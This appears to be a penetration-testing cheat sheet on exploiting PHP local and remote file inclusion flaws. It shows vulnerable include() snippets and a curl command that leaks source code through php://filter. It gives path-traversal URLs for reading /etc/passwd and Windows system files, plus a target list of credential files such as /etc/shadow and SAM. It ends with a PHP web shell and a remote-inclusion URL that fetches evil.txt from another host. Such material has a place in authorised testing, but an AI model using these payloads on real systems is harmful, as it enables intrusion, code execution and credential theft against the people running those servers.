A Penetration Testing Framework
There is a Python tool called fimap which can be leveraged to automate the exploitation of LFI/RFI vulnerabilities that are found in PHP (sqlmap for LFI): (https://github.com/kurobeats/fimap)
If a phpinfo() file is present, it’s usually possible to get a shell, if you don’t know the location of the phpinfo file fimap can probe for it, or you could use a tool like OWASP DirBuster.
include("lang/".$\_COOKIE\['lang'\]);
include($\_GET\['page'\].".php");
curl -s \
"http://$ip/?page=<php://filter/convert.base64-encode/resource=index>" \
| grep -e '\\[^\\ \\]\\{40,\\}' | base64 -d
http://$ip/index.php?page=<php://filter/convert.base64-encode/resource=admin.php>
/etc/issue
/proc/version
/etc/profile
/etc/passwd
/etc/passwd
/etc/shadow
/root/.bash_history
/var/log/dmessage
/var/mail/root
/var/spool/cron/crontabs/root
%SYSTEMROOT%\\repair\\system
%SYSTEMROOT%\\repair\\SAM
%SYSTEMROOT%\\repair\\SAM
%WINDIR%\\win.ini
%SYSTEMDRIVE%\\boot.ini
%WINDIR%\\Panther\\sysprep.inf
%WINDIR%\\system32\\config\\AppEvent.Evt
/etc/fstab
/etc/master.passwd
/etc/resolv.conf
/etc/sudoers
/etc/sysctl.conf
http://$ip/index.php?page=/etc/passwd
http://$ip/index.php?file=../../../../etc/passwd
http://$ip/index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd
GET /addguestbook.php?name=Haxor&comment=Merci!&LANG=../../../../../../../windows/system32/drivers/etc/hosts%00
<?php echo shell\_exec($\_GET\['cmd'\]);?>
For a Remote File Inclusion look for php code that is not sanitized and passed to the PHP include function and the php.ini file must be configured to allow remote files
/etc/php5/cgi/php.ini* - "allow_url_fopen" and "allow_url_include" both set to "on"
include($\_REQUEST\["file"\].".php");
Remote File Inclusion
http://192.168.11.35/addguestbook.php?name=a&comment=b&LANG=http://192.168.10.5/evil.txt
<?php echo shell_exec("ipconfig");?>